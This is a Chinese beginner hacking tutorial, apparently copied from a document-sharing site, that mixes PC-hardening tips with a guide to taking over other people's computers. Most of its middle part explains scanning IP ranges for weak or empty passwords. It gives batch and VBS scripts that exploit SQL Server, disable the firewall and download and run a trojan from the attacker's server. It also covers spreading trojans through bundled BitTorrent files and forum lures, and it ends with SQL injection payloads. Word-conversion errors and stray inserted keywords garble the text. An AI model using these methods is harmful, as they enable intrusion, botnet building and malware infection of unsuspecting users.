首页 从零开始学习黑客技术入门教程基础

从零开始学习黑客技术入门教程基础

举报
开通vip

从零开始学习黑客技术入门教程基础----word.zl-最简单的黑客入门教程目录TOC\o"1-3"\h\z\uHYPERLINK\l"_Toc259542941"1黑客简介PAGEREF_Toc259542941\h2HYPERLINK\l"_Toc259542942"2保护自己电脑绝对不做黑客肉鸡PAGEREF_Toc259542942\h2HYPERLINK\l"_Toc259542943"3抓肉鸡的几种方法PAGEREF_Toc259542943\h5HYPERLINK\l"_Toc2595429...

从零开始学习黑客技术入门教程基础
----word.zl-最简单的黑客入门教程目录TOC\o"1-3"\h\z\uHYPERLINK\l"_Toc259542941"1黑客简介PAGEREF_Toc259542941\h2HYPERLINK\l"_Toc259542942"2保护自己电脑绝对不做黑客肉鸡PAGEREF_Toc259542942\h2HYPERLINK\l"_Toc259542943"3抓肉鸡的几种方法PAGEREF_Toc259542943\h5HYPERLINK\l"_Toc259542944"4防止黑客通过Explorer侵入系统PAGEREF_Toc259542944\h9HYPERLINK\l"_Toc259542945"5SQL注入详解PAGEREF_Toc259542945\h10HYPERLINK\l"_Toc259542946"5.1注入工具PAGEREF_Toc259542946\h11HYPERLINK\l"_Toc259542947"5.2php+Mysql注入的误区PAGEREF_Toc259542947\h11HYPERLINK\l"_Toc259542948"5.3简单的例子PAGEREF_Toc259542948\h12HYPERLINK\l"_Toc259542949"5.4语句构造PAGEREF_Toc259542949\h14HYPERLINK\l"_Toc259542950"5.5高级应用PAGEREF_Toc259542950\h22HYPERLINK\l"_Toc259542951"5.6实例PAGEREF_Toc259542951\h26HYPERLINK\l"_Toc259542952"5.7注入的防PAGEREF_Toc259542952\h29HYPERLINK\l"_Toc259542953"5.8我看暴库漏洞原理及规律1PAGEREF_Toc259542953\h29HYPERLINK\l"_Toc259542954"5.9我看暴库漏洞原理及规律2PAGEREF_Toc259542954\h32HYPERLINK\l"_Toc259542955"6跨站脚本攻击PAGEREF_Toc259542955\h34HYPERLINK\l"_Toc259542956"6.1跨站脚本工具PAGEREF_Toc259542956\h34HYPERLINK\l"_Toc259542957"6.2什么是XSS攻击PAGEREF_Toc259542957\h35HYPERLINK\l"_Toc259542958"6.3如何寻找XSS漏洞PAGEREF_Toc259542958\h35HYPERLINK\l"_Toc259542959"6.4寻找跨站漏洞PAGEREF_Toc259542959\h36HYPERLINK\l"_Toc259542960"6.5如何利用PAGEREF_Toc259542960\h36HYPERLINK\l"_Toc259542961"6.6XSS与其它技术的结合PAGEREF_Toc259542961\h38HYPERLINK\l"_Toc259542962"7XPath注入PAGEREF_Toc259542962\h38HYPERLINK\l"_Toc259542963"7.1XPath注入介绍PAGEREF_Toc259542963\h38HYPERLINK\l"_Toc259542964"7.2XPath注入工具PAGEREF_Toc259542964\h41声明:大多是网上收集而来,归其原作者所有。黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的平安破坏者。关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。有些人认为,我们应该承受"黑客"一词已经被用滥并且有了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进展有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比方使用"恶意的平安骇客"会更容易让对方理解我所指的对象,从而能够到达更好的沟通交流效果,也防止了对"黑客"一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对平安防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。如果你只是简单的将"黑客"和"恶意的平安骇客"划等号,将无法在与人交流平安技术问题时,轻松的分区分人所指的到底是哪种类型的人。黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者那么是通过技术获取职业开展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进展职业开展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向开展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并以此为乐。对于某些人来说,这个词并不准确,而对于另一些人来说,黑客意味着最终能完全掌握某些事情。根据RFC1392的记载,互联网用户词汇将"黑客"定义为:迷恋于获取某些系统尤其是计算机和计算机网络系统部运作机制的人。而这个词经常被错误的用于贬义环境。在贬义环境中,正确的用词应该是"骇客"。TheJargonWiki对于"黑客"的首次定义为:迷恋于探知可编程系统细节以及如何扩展其功能的人,与大多数只需了解系统根本知识的人不同。而平安骇客,那么是以破坏平安系统为目的的人。有些平安骇客最终会用自己所掌握的技术做善事,提供渗透测试效劳,或者其他有利于平安防护的工作。而更多的人那么是利用自己的技术行恶事。在RFC1392和JargonWiki中都对"骇客"进展了类似的贬义定义。在不同的环境中使用正确的术语,对于沟通来说是非常重要的。在这方面我是有过切身体验的。一次与一家企业的负责人交流时,我们使用了一样的词汇,但是所指的对象却正好相反,结果沟通效果非常失败。当两种不同的背景下需要同一个词汇时,比方需要谈到传统意义的黑客以及带有恶意目的的骇客时,如果不事先将术语解释清楚,或给出一定的规,肯定会导致交流困难。对于目前的交流来说,一个更简单的方法就是只适用恶意平安骇客,而不是黑客,这是因为:目前大局部消息中所指的,都是带有恶意目的的骇客,而不是以技术为目标的黑客。这就是为什么在我的文章中,总是会使用"恶意的平安骇客"来代指从事恶意活动的人,而在某些文章中如果需要涉及到传统意义的"黑客",我也会在文中再次进展说明。在讨论平安话题时,为了能更清晰的交流,我也建议大家和我一样采用正确的词汇。保护自己电脑绝对不做黑客肉鸡第一招:屏幕保护在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间到达预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会翻开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的平安。提示:局部 设计 领导形象设计圆作业设计ao工艺污水处理厂设计附属工程施工组织设计清扫机器人结构设计 不完善的屏幕保护程序没有屏蔽系统的"Ctrl+Alt+Del"的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug.不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要翻开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的"在当前位置创立快捷方式"命令,在桌面上为这些屏幕保护程序建立一个快捷方式。此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。第二招:巧妙隐藏硬盘在"按Web页"查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果"修改该文件夹的容可能导致程序运行不正常,要查看该文件夹的容,请单击显示文件",这时单击"显示文件"就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击"查看"标签,选择"显示所有文件",这样就可以看见这两个文件了)。再按"F5"键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。接下来我们用"记事本"翻开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系,先找到"显示文件"将其删除,找到"修改该文件夹的可能导致程序运行不正常,要查看该文件夹的容,请单击显示文件",将其改为自己喜欢的文字,例如"平安重地,闲杂人等请速离开"。将"要查看该文件夹的容,请单击"改为"否那么,后果自负!",接着向下拖动滑块到倒数第9行,找到"(file://%TEMPLATEDIR%\wvlogo.gif)"这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用"d:\tupian\tupian1.jpg"替换"//"后面的容,记住这里必须将图片的后缀名打出,否那么将显示不出图片。当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中"~"之间的容就可以了。*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0*usingthefile%THISDIRPATH%\folder.htt.保存并退出,按"F5"键刷新一下,是不是很有个性?接下来要作的就是用"超级兔子"将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中"~"之间的容全部删除,这样就会给翻开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更平安。第三招:禁用"开场"菜单命令在Windows2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的平安性。运行"开场→运行"命令,在"运行"对话框的"翻开"栏中输入"gpedit.msc",然后单击"确定"按钮即可启动WindowsXP组策略编辑器。在"本地计算机策略"中,逐级展开"用户配置→管理模板→任务栏和开场菜单"分支,在右侧窗口中提供了"任务栏"和"开场菜单"的有关策略。在禁用"开场"菜单命令的时候,在右侧窗口中,提供了删除"开场"菜单中的公用程序组、"我的文档"图标、"文档"菜单、"网上邻居"图标等策略。清理"开场"菜单的时候只要将不需要的菜单项所对应的策略启用即可,比方以删除"我的文档"图标为例,具体操作步骤为:1)在策略列表窗口中用鼠标双击"从开场菜单中删除我的文档图标"选项。2)在弹出窗口的"设置"标签中,选择"已启用"单项选择按钮,然后单击"确定"即可。第四招:桌面相关选项的禁用WindowsXP的桌面就像你的办公桌一样,有时需要进展整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在"本地计算机策略"中展开"用户配置→管理模板→桌面"分支,即可在右侧窗口中显示相应的策略选项。1)隐藏桌面的系统图标倘假设隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地到达此目的。假设要隐藏桌面上的"网上邻居"和"InternetEXPlorer"图标,只要在右侧窗口中将"隐藏桌面上网上邻居图标"和"隐藏桌面上的InternetEXPlorer图标"两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将"隐藏和禁用桌面上的所有工程"启用即可。当启用了"删除桌面上的我的文档图标"和"删除桌面上的我的电脑图标"两个选项以后,"我的电脑"和"我的文档"图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢"回收站"这个图标,那么也可以把它给删除,具体方法是将"从桌面删除回收站"策略项启用。2)制止对桌面的某些更改如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将"退出时不保存设置"这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和翻开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。第五招:制止访问"控制面板"如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开"本地计算机策略→用户配置→管理模板→控制面板"分支,然后将右侧窗口的"制止访问控制面板"策略启用即可。此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板工程。另外,这个设置将从"开场"菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。提示:如果你想从上下文菜单的属性工程中选择一个"控制面板"工程,会出现一个消息,说明该设置防止这个操作。第六招:设置用户权限当多人共用一台计算机时,在WindowsXP中设置用户权限,可以按照以下步骤进展:1)运行组策略编辑器程序。2)在编辑器窗口的左侧窗口中逐级展开"计算机配置→Windows设置→平安设置→本地策略→用户权限指派"分支。3)双击需要改变的用户权限,单击"添加用户或组"按钮,然后双击想指派给权限的用户账号,最后单击"确定"按钮退出。第七招:文件夹设置审核WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的平安。为文件和文件夹设置审核的步骤如下:1)在组策略窗口中,逐级展开右侧窗口中的"计算机配置→Windows设置→平安设置→本地策略"分支,然后在该分支下选择"审核策略"选项。2)在右侧窗口中用鼠标双击"审核对象访问"选项。3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的"属性"命令,接着在弹出的窗口中选择"平安"标签。4)单击"高级"按钮,然后选择"审核"标签。5)根据具体情况选择你的操作:倘假设对一个新组或用户设置审核,可以单击"添加"按钮,并且在"名称"框中键入新用户名,然后单击"确定"按钮翻开"审核工程"对话框。要查看或更改原有的组或用户审核,可以选择用户名,然后单击"查看/编辑"按钮。要删除原有的组或用户审核,可以选择用户名,然后单击"删除"按钮即可。6)如有必要的话,在"审核工程"对话框中的"应用到"列表中选取你希望审核的地方。7)如果想制止目录树中的文件和子文件夹继承这些审核工程,选择"仅对此容器的对象和/或容器应用这些审核项"复选框。注意:必须是管理员组成员或在组策略中被授权有"管理审核和平安日志"权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前,你必须启用组策略中"审核策略"的"审核对象访问"。否那么,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。抓肉鸡的几种方法找点工具就OK了端口抓肉鸡的几种方法肉鸡大家都应该清楚是什么东西吧!呵呵这点就不用说了.............慢慢学1、3389抓鸡现在国网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且根本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器〔也可以把结果保存为文本文件,用批量生成3389连接的工具来连接〕,然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去〔XP只支持单用户登入,用户登入需要用工具开〕,或者电脑前有人你就不可能去翻开IE下载木马了。2、扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。〔详细动画可以去黑客搜索135〕3、扫445端口抓肉鸡和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。〔详细动画可以去黑客搜索445〕4、1433端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S扫sqlhello.exenc.exe批处理文件首先先写个批处理,翻开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件echoofffor/f"eol=;tokens=1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j14331000/saveechoofffor/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i1433xxx.xxx.xx.xx556还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理echooffNc-l-vv-p556>daima.txtechousername>>daima.txtechopassword>>daima.txtechobin>>daima.txt(以2进制传输数据)echogetxxx.exe(你的木马的文件名,要放在根目录下)>>daima.txtechobye>>daima.txtnetstopsharedaccess(关闭WINDOWS自带防火墙)ftp-s:daima.txtxxx.exe(也是填你木马的文件名)deldaima.txt注意上面的代码回车符别删掉,要不然就没法下你的马了。几种肉鸡上传文件的方法tftp法先在自己某机器上建个tftp效劳器,如执行tftpd32.exe,再将文件〔sample.exe)上传到别的机器中(肉鸡〕,肉鸡cmd中执行:tftp-i效劳器ipgetsample.exeftp法肉鸡cmd中执行:echoopenftp效劳器ip[端口]>ftp.txtechousername>>ftp.txtechopassword>>ftp.txtechogetsample.exe>>ftp.txtechobye>>ftp.txtftp-s:ftp.txtdelftp.txt工具法利用wineggdrop的wget.exe肉鸡cmd中执行:wget/sample.exe利用dl.vbe法肉鸡cmd中执行:echowithwscript:if.arguments.count^<2then.quit:endif>dl.vbeechosetaso=.createobject("adodb.stream"):setweb=createobject("microsoft.xml")>>dl.vbeechoweb.open"get",.arguments(0),0:web.send:ifweb.status^>200thenquit>>dl.vbeechoaso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile.arguments(1),2:endwith>dl.vbecscriptdl.vbe*。*。*。*:88/sample.exesample.exe利用iget.vbe法方法同4,肉鸡cmd中执行:echoiLocal=LCase(WScript.Arguments(1))>iget.vbeechoiRemote=LCase(WScript.Arguments(0))>>iget.vbeechoSetxPost=CreateObject("Microsoft.XML")>>iget.vbeechoxPost.Open"GET",iRemote,0>>iget.vbeechoxPost.Send()>>iget.vbeechoSetsGet=CreateObject("ADODB.Stream")>>iget.vbeechosGet.Mode=3>>iget.vbeechosGet.Type=1>>iget.vbeechosGet.Open()>>iget.vbeechosGet.Write(xPost.responseBody)>>iget.vbeechosGet.SaveToFileiLocal,2>>iget.vbecscriptiget.vbe*。*。*。*/sample.exesample.exe利用vbe法echoSetxPost=CreateObject("Microsoft.XML")>dsa.vbeechoxPost.Open"GET","*.*.*.*/sample.exe",0>>dsa.vbeechoxPost.Send()>>dsa.vbeechoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbeechosGet.Mode=3>>dsa.vbeechosGet.Type=1>>dsa.vbeechosGet.Open()>>dsa.vbeechosGet.Write(xPost.responseBody)>>dsa.vbeechosGet.SaveToFile"sample.exe",2>>dsa.vbecscriptdsa.vbedeldsa.vbe3389法可以开3389,然后登陆,进展本地的下载。该方法对效劳器上传很严格的机器特有效。〔包括硬件防火墙〕先翻开多个NC.bat,然后再翻开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客搜索1433。忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。先休息一下,打这么多字累死了继续5、扫1433抓肉鸡之方法2要用到的工具:端口扫描器X-scanSQL综合利用工具上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。开了1433端口的机器一般都装了SQL,所以我们可以猜想SQL弱口令来抓1433肉鸡。首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开场扫描了。扫描完成后会有个 报告 软件系统测试报告下载sgs报告如何下载关于路面塌陷情况报告535n,sgs报告怎么下载竣工报告下载 ,列出了有弱口令的机器,然后翻开SQL综合利用工具,输入你扫到的弱口令来连接,接着翻开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。6、用WINNTAutoAttack扫SA弱口令抓肉鸡其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下,呵呵。工具:WINNTAutoAttackSQL综合利用工具翻开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进展检测和SQL列出密码为空的SA账号,接着开场扫描,扫完后,用SQL综合利用工具连上传马执行就好了。7、扫4899空口令抓肉鸡工具:端口扫描器4899探测器Radmin首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客搜索48998、扫5900端口抓VNC肉鸡工具:VNC扫描器VNC连接器首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe〔扫描器文件名〕-i219.0.0.0-219.255.255.255〔扫描IP段〕-p5900-vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,翻开后有一列IP,IP后面的有一些单词比方patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧?详细动画可以去黑客搜索VNC接下来说说挂马抓肉鸡吧。方法有很多,比方BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。1、BT挂马顾名思义,就是把你的木马发布到BT让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开场下载时会知道RAR里有木马呢?当他费了好大劲下载完,翻开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住翻开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中〔不是所有文件都可以这样的,我只知道RM和EXE文件可以插入〕,别人下载翻开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件〔比方RM捆绑木马后保持RM格式〕,那样别人不就不会疑心了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马病症为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次翻开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。2、免费空间挂马其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶。.hookbase.上面有好多可以学的,不清楚的问下我防止黑客通过Explorer侵入系统给点票票撒..........好不容易研究出来的哦绝对实用...恶意黑客和病毒编译者能利用你和网页浏览软件中的不平安设置来侵入你的电脑。他们可以通过给你发电子或者诱惑你浏览含有恶意代码的网页来到达他们的目的。通过提高你的微软IE浏览器,Outltlook和OutlookExpress的平安设置,可以来帮助你减小被攻击的可能。恶意黑客和病毒编译者能利用你和网页浏览软件中的不平安设置来侵入你的电脑。他们可以通过给你发电子或者诱惑你浏览含有恶意代码的网页来到达他们的目的。通过提高你的微软IE浏览器,Outltlook和OutlookExpress的平安设置,可以来帮助你减小被攻击的可能。步骤一:设置你浏览器平安级别为高在你使用IE浏览器来浏览网页的时候来提升平安等级:1.在IE的工具菜单中点击Internet选项。2.在InternetOptions的对话框中,点击平安标签,并选择Internet图标。3.在该区域的平安级别选项中,滑动滑条至最高点。这样设置你浏览的所有的平安级别为最高。(如果没有滑动条,点击默认级别然后再滑动滑条至最高点。)注意:高的设置可能导致一些不可以正常浏览。如果你在改变这个设置后难以正常浏览网页,你可以将你要浏览的网页加到受信任站点列表当中。这将允许网页可以在高平安设置的情况下正常浏览。步骤二:加平安到受信任站点列表设置IE平安级别到高可能导致一些步可以正常访问,这其中包括了MicrosoftWindows?Update。如果你在改变了设置后不能正常访问,你可以把他们加到受信任站点的列表当中,这将令可正常工作。微软建议先将Windowsupdatewindowsupdate.microsoft.)参加受信任站点列表,从而你能直接安装总要的系统升级。加平安到受信任站点列表:1.在IE工具菜单,点击Internet选项。2.在Internet选项的对话框中,点击平安标签。3.点击受信任站点的图标,并点击按钮。4.在受信任站点对话框中,输入的URL在"将该添加到区域中"的对话框里,并且点击添加。受信任站点的特点是只能用以:开头的URL。取消对该区域中的所有站点要求效劳器验证的选项。5.点击确定。6.在该区域的平安级别中,移动滑条至中级。这样就设定所有你信赖的站点的平安级别为中级。(如果没有滑动条,点击默认级别然后再滑动滑条至最高点。)步骤三:以明文阅读电子信息为了帮助提高你的电子的平安性,设置Outlook或者OutlookExpress为明文阅读所有信息。在OutlookExpress设置明文阅读信息:1.在OutlookExpress工具菜单中,点击选项。2.在选项对话框中,点击阅读标签。3.选择明文阅读所有信息。4.点击确定。在Outlook设置明文阅读信息:1.在OutlookExpress工具菜单中,点击选项。2.在选项对话框中首选参数的标签下,点击电子选项按钮。3.在选项对话框中,选择阅读以文本格式阅读所有标准。4.点击确定来关闭选项对话框,再点击确定关闭选项对话框。步骤四:在你的浏览器中阻止弹出窗口为了保护你的电脑不受恶意弹出窗口的影响,而采取一定的 措施 《全国民用建筑工程设计技术措施》规划•建筑•景观全国民用建筑工程设计技术措施》规划•建筑•景观软件质量保证措施下载工地伤害及预防措施下载关于贯彻落实的具体措施 来阻止他们翻开。一些使用小的浏览窗口来显示广告,有时会是一些烦人的容。恶意的攻击者也可能利用弹出窗口伪装成广告或者建议来在你的电脑上安装恶意代码。有效的方法是你在你的浏览器中安装一个防止弹出窗口的工具。大局部类似的软件与IE都是兼容的,其中就包括免费的MSN工具栏。SQL注入详解2003年开场,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国才开场注意这个技术,由此看来,国的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQL注入攻击也相当熟悉了,国各大站点都有些堪称经典的作品,不过作为一篇完整的文章,我觉得还是有必要再说说其定义和原理。如果哪位高手已经到达炉火纯青的地步,不妨给本文挑点刺。权当指点小弟。国能看到php+Mysql注入的文章可能比拟少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。不过由于国研究PHP的人比研究ASP的人实在少太多,所以,可能没有注意,况且PHP的平安性比ASP高很多,导致很多人不想跨越这个门槛。尽管如此,在PHP站点日益增多的今天,SQL注入仍是最有效最麻烦的一种攻击方式,有效是因为至少70%以上的站点存在SQLInjection漏洞,包括国大局部平安站点,麻烦是因为MYSQL4以下的版本是不支持子语句的,而且当php.ini里的magic_quotes_gpc为On时。提交的变量中所有的'(单引号),"(双引号),(反斜线)and空字符会自动转为含有反斜线的转义字符。给注入带来不少的阻碍。注入工具关于SQL注入,目前已经有工具软件支持,如WebCruiser-WebVulnerabilityScanner〔Web平安漏洞扫描工具,可以扫描出存在SQL注入、跨站脚本攻击、XPath注入的页面,并且可以进一步进展SQL注入验证、跨站攻击验证、XPath注入验证,官方为HYPERLINK"sec4app."sec4app.〕:如果您想深入学习手工注入,请继续往下看:早期的时候,根据程序的代码,要构造出没有引号的语句形成有效的攻击,还真的有点困难,好在现在的技术已经构造出不带引号的语句应用在某些场合。只要有经历,其实构造有效的语句一点也不难,甚至成功率也很高,但具体情况具体 分析 定性数据统计分析pdf销售业绩分析模板建筑结构震害分析销售进度分析表京东商城竞争战略分析 。首先要走出一个误区。注:在没有具体说明的情况下,我们假设magic_quotes_gpc均为off。php+Mysql注入的误区很多人认为在PHP+MYSQL下注入一定要用到单引号,或者是没有方法像MSSQL那样可以使用"declareasysnameselecta=execmaster.dbo.xp_cmdshella"这类的命令来消除引号,其实这个是大家对注入的一种误解或这说是对注入认识上的一种误区。为什么呢?因为不管在什么语言里,在引号〔包括单双〕里,所有字符串均是常量,即使是dir这样的命令,也紧紧是字符串而已,并不能当做命令执行,除非是这样写的代码:$mand="dirc:";system($mand);否那么仅仅只是字符串,当然,我们所说的命令不单指系统命令,我们这里说的是SQL语句,要让我们构造的SQL语句正常执行,就不能让我们的语句变成字符串,那么什么情况下会用单引号?什么时候不用呢?看看下面两句SQL语句:①SELECT*FROMarticleWHEREarticleid='$id'②SELECT*FROMarticleWHEREarticleid=$id两种写法在各种程序中都很普遍,但平安性是不同的,第一句由于把变量$id放在一对单引号中,这样使得我们所提交的变量都变成了字符串,即使包含了正确的SQL语句,也不会正常执行,而第二句不同,由于没有把变量放进单引号中,那我们所提交的一切,只要包含空格,那空格后的变量都会作为SQL语句执行,我们针对两个句子分别提交两个成功注入的畸形语句,来看看不同之处。①指定变量$id为:1'and1=2unionselect*fromuserwhereuserid=1/*此时整个SQL语句变为:SELECT*FROMarticleWHEREarticleid='1'and1=2unionselect*fromuserwhereuserid=1/*'②指定变量$id为:1and1=2unionselect*fromuserwhereuserid=1此时整个SQL语句变为:SELECT*FROMarticleWHEREarticleid=1and1=2unionselect*fromuserwhereuserid=1看出来了吗?由于第一句有单引号,我们必须先闭合前面的单引号,这样才能使后面的语句作为SQL执行,并要注释掉后面原SQL语句中的后面的单引号,这样才可以成功注入,如果php.ini中magic_quotes_gpc设置为on或者变量前使用了addslashes()函数,我们的攻击就会化为乌有,但第二句没有用引号包含变量,那我们也不用考虑去闭合、注释,直接提交就OK了。大家看到一些文章给出的语句中没有包含单引号例如pinkeyes的?php注入实例?中给出的那句SQL语句,是没有包含引号的,大家不要认为真的可以不用引号注入,仔细看看PHPBB的代码,就可以发现,那个$forum_id所在的SQL语句是这样写的:$sql="SELECT*FROM".FORUMS_TABLE."WHEREforum_id=$forum_id";由于没有用单引号包含变量,才给pinkeyes这个家伙有机可乘,所以大家在写PHP程序的时候,记得用单引号把变量包含起来。当然,必要的平安措施是必不可少的。简单的例子先举一个例子来给大家了解一下PHP下的注入的特殊性和原理。当然,这个例子也可以告诉大家如何学习构造有效的SQL语句。我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:CREATETABLE`user`(`userid`int(11)NOTNULLauto_increment,`username`varchar(20)NOTNULLdefault'',`password`varchar(20)NOTNULLdefault'',PRIMARYKEY(`userid`))TYPE=MyISAMAUTO_INCREMENT=3;##导出表中的数据`user`#INSERTINTO`user`VALUES(1,'angel','mypass');验证用户文件的代码如下:这时我们提交:127.0.0.1/injection/user.php?username=angel'or1=1就会返回:Warning:mysql_fetch_array():suppliedar